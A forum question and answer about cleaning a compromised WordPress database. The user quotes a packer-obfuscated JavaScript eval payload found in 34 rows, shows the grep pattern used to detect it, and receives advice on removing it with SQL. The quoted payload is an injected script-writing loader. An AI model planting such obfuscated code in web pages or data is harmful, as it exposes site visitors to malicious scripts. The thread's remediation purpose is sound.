# Search SQL database for malicious code using grep or find

Tags: mysql

The following code exists in 34 entries in my WordPress database.

```
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|andfs|var|u0026u|referrer|hseaf||js|php'.split('|'),0,{}))
```

I have found these entries using `grep -c "p,a,c,k,e,d" database_backup.sql`. Now I am needing to run a grep/find command, or a shell SQL command to select and remove this code from the affected rows.

Comment: What's wrong with something like sed 's/p,a,c,k,e,d//' database_backup.sql (or similar  - a quick search should do this. In any case, this really isn't a database question, but rather one for a Linux/Unix forum - or possibly StackOverflow, but not dba.

Answer (score 1):

I could be quite a challenge to change the dump file.  So, instead, load the data into a different database (preferably a different computer), then use SQL to find and zap.

A problem with trying to do it in the dump file is that it probably has multiple (hundreds or thousands) rows in a single `INSERT` statement.  In fact, there may be only 34 `INSERT` statement, and perhaps *every* row is infected.

As for "removing the code", we would need to see

- `SHOW CREATE TABLE`
- the name of the infected column
- Whether the entire column looks like that, or that is embedded in the string and you want to save the rest.